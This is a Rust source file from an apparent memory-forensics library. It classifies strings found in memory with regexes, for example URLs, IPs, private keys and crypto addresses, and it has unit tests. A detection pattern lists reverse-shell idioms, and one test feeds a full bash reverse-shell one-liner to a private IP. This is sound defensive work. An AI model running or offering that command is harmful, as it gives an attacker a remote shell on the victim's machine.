memf-strings 0.2.1

String extraction, classification, and YARA-X scanning for memory forensics
Documentation
//! Regex-based string classifier for URLs, IPs, emails, paths, and credentials.

use crate::classify::StringClassifier;
use crate::StringCategory;
use regex::Regex;
use std::sync::OnceLock;

struct PatternEntry {
    regex: Regex,
    category: StringCategory,
    confidence: f32,
}

/// Static (pattern, category, confidence) classification table.
///
/// Patterns are compile-time-constant and known-valid; building the live
/// `PatternEntry` table filters out any that fail to compile (defence in
/// depth) rather than panicking, so a future bad edit degrades to a missing
/// category instead of an abort.
const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
    (
        "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
        StringCategory::Url,
        0.90,
    ),
    (
        r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)$",
        StringCategory::IpV4,
        0.95,
    ),
    // IPv6: full 8-group, compressed (::), loopback (::1), etc.
    // Covers RFC 5952 canonical forms without interface ID suffixes.
    (
        concat!(
            r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
            r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
            r"|^::$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
            r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
        ),
        StringCategory::IpV6,
        0.95,
    ),
    (
        r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
        StringCategory::Email,
        0.90,
    ),
    (
        r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
        StringCategory::UnixPath,
        0.85,
    ),
    (
        r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
        StringCategory::WindowsPath,
        0.85,
    ),
    (
        r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR)\\",
        StringCategory::RegistryKey,
        0.95,
    ),
    (
        r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
        StringCategory::CryptoAddress,
        0.70,
    ),
    (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
    (
        r"^bc1[a-zA-HJ-NP-Z0-9]{25,39}$",
        StringCategory::CryptoAddress,
        0.85,
    ),
    (
        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
        StringCategory::PrivateKey,
        0.99,
    ),
    (
        r"^[A-Za-z0-9+/]{20,}={0,2}$",
        StringCategory::Base64Blob,
        0.40,
    ),
    (
        r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
        StringCategory::ShellCommand,
        0.90,
    ),
];

fn patterns() -> &'static [PatternEntry] {
    static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
    PATTERNS.get_or_init(|| {
        PATTERN_SPECS
            .iter()
            .filter_map(|(pat, category, confidence)| {
                Regex::new(pat).ok().map(|regex| PatternEntry {
                    regex,
                    category: category.clone(),
                    confidence: *confidence,
                })
            })
            .collect()
    })
}

/// A classifier that uses compiled regexes to categorize strings.
pub struct RegexClassifier;

impl StringClassifier for RegexClassifier {
    fn name(&self) -> &str {
        "regex"
    }

    fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
        let mut results = Vec::new();
        for entry in patterns() {
            if entry.regex.is_match(input) {
                results.push((entry.category.clone(), entry.confidence));
            }
        }
        results
    }
}

inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);

#[cfg(test)]
mod tests {
    use super::*;

    fn classify(input: &str) -> Vec<(StringCategory, f32)> {
        RegexClassifier.classify(input)
    }

    #[test]
    fn classifies_url() {
        let r = classify("https://evil.com/payload.exe");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
    }

    #[test]
    fn classifies_ipv4() {
        let r = classify("192.168.1.1");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::IpV4));
    }

    #[test]
    fn classifies_email() {
        let r = classify("user@example.com");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Email));
    }

    #[test]
    fn classifies_unix_path() {
        let r = classify("/etc/passwd");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::UnixPath));
    }

    #[test]
    fn classifies_windows_path() {
        let r = classify("C:\\Windows\\System32\\cmd.exe");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::WindowsPath));
    }

    #[test]
    fn classifies_registry_key() {
        let r = classify("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::RegistryKey));
    }

    #[test]
    fn classifies_ethereum_address() {
        let r = classify("0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
    }

    #[test]
    fn classifies_pem_private_key() {
        let r = classify("-----BEGIN RSA PRIVATE KEY-----");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
    }

    #[test]
    fn classifies_shell_command() {
        let r = classify("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::ShellCommand));
    }

    #[test]
    fn no_match_for_garbage() {
        let r = classify("xyzq");
        assert!(r.is_empty());
    }

    #[test]
    fn classifies_btc_legacy_address() {
        // BTC legacy addresses start with 1 or 3
        let r = classify("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
    }

    #[test]
    fn classifies_btc_bech32_address() {
        // BTC bech32 addresses start with bc1
        let r = classify("bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
    }

    #[test]
    fn classifies_base64_blob() {
        let r = classify("SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Base64Blob));
    }

    #[test]
    fn classifier_name() {
        let classifier = RegexClassifier;
        assert_eq!(classifier.name(), "regex");
    }

    #[test]
    fn classifies_http_url() {
        let r = classify("http://example.com/page");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
    }

    #[test]
    fn classifies_private_key_variants() {
        let r = classify("-----BEGIN PRIVATE KEY-----");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));

        let r2 = classify("-----BEGIN EC PRIVATE KEY-----");
        assert!(r2.iter().any(|(c, _)| *c == StringCategory::PrivateKey));

        let r3 = classify("-----BEGIN OPENSSH PRIVATE KEY-----");
        assert!(r3.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
    }

    #[test]
    fn classifies_ipv6_full() {
        // Full 8-group IPv6 address
        let r = classify("2001:0db8:85a3:0000:0000:8a2e:0370:7334");
        assert!(
            r.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "expected IpV6 classification for a full IPv6 address"
        );
    }

    #[test]
    fn classifies_ipv6_compressed() {
        // Compressed IPv6 with :: notation
        let r = classify("::1");
        assert!(
            r.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "expected IpV6 classification for loopback ::1"
        );
    }

    #[test]
    fn classifies_ipv6_mixed_notation() {
        // Mixed IPv4/IPv6 compressed form
        let _r = classify("fe80::1%eth0");
        // This may or may not match depending on whether we include interface IDs;
        // at minimum fe80::1 without the interface suffix must match.
        let r2 = classify("fe80::1");
        assert!(
            r2.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "expected IpV6 classification for fe80::1 link-local"
        );
    }
}